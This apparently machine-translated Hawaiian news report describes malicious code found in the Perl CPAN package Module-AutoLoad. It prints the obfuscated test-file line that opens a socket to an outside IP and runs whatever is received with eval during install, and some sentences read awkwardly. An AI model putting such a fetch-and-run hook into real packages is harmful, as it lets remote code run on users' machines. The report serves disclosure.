ʻIke ʻia ka code ʻino ma ka pūʻolo Module-AutoLoad Perl
Ma kahi pūʻolo Perl i māhele ʻia ma o ka papa kuhikuhi CPAN Module-AutoLoad, i hoʻolālā ʻia e hoʻouka maʻalahi i nā modula CPAN ma ka lele, ʻike ʻia code hōʻino. ʻO ka hoʻokomo ʻino loaa ma ke code ho'āʻo 05_rcx.t, i hoʻouna ʻia mai ka makahiki 2011.
He mea pono ke ala mai nā nīnau e pili ana i ka hoʻouka ʻana i nā code nīnau Stackoverflow hoʻi i ka makahiki 2016.
Hoʻomaka ka hana ʻino i ka hoʻāʻo e hoʻoiho a hoʻokō i ke code mai kahi kikowaena ʻaoʻao ʻekolu (http://r.cx:1/) i ka wā o ka hoʻokō ʻana i kahi suite hoʻāʻo i hoʻomaka ʻia i ka wā e hoʻokomo ai i ka module. Ua manaʻo ʻia ʻaʻole hewa ke code i hoʻoiho mua ʻia mai ka server waho, akā i kēia manawa ua hoʻohuli ʻia ka noi i ka domain ww.limera1n.com, e hāʻawi ana i kāna ʻāpana o ke code no ka hoʻokō.
No ka hoʻonohonoho ʻana i ka hoʻoiho ʻana ma kahi faila 05_rcx.t Hoʻohana ʻia kēia code:
ʻO ke code i kuhikuhi ʻia e hoʻokō ʻia ka palapala ../contrib/RCX.pl, nā mea i hoʻemi ʻia i ka laina:
hoʻohana i ka lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
Hoʻouka kēia palapala huikau hoʻohana i ka lawelawe perlobfuscator.com code mai ka mea hoʻokipa waho r.cx (nā huaʻōlelo 82.46.99.88 e pili ana i ka kikokikona "R.cX") a hoʻokō iā ia ma ka poloka eval.
Ua wehe ʻia ka pūʻolo pilikia mai ka waihona. PAEA (Perl Authors Upload Server), a ua ālai 'ia ka mooolelo o ka mea kākau. I kēia hihia, e mau ana ka module loaʻa i loko o ka waihona MetaCPAN a hiki ke hoʻokomo pololei ʻia mai MetaCPAN me ka hoʻohana ʻana i kekahi mau pono e like me cpanminus. Hoʻomaopopo ʻiaʻaʻole i hoʻolaha nui ʻia ka pūʻolo.
hoihoi ke kūkākūkā pili a me ka mea kākau o ka module, ka mea i hōʻole i ka 'ike i hoʻokomo 'ia malicious code ma hope o kona paena "r.cx" i hacked a wehewehe i ka leʻaleʻa wale, a hoʻohana i ka perlobfuscator.com 'aʻole e hūnā i kekahi mea, akā, e ho'ēmi i ka nui. o ke code a maʻalahi i kāna kope ʻana ma o ka clipboard. ʻO ke koho ʻana o ka inoa hana "botstrap" i wehewehe ʻia e ka ʻoiaʻiʻo o kēia huaʻōlelo "e like me ka bot a ʻoi aku ka pōkole ma mua o ka bootstrap." Ua hōʻoia pū ka mea kākau o ka module ʻaʻole hana nā manipulations i ʻike ʻia i nā hana ʻino, akā hōʻike wale i ka hoʻouka ʻana a me ka hoʻokō ʻana i ke code ma o TCP.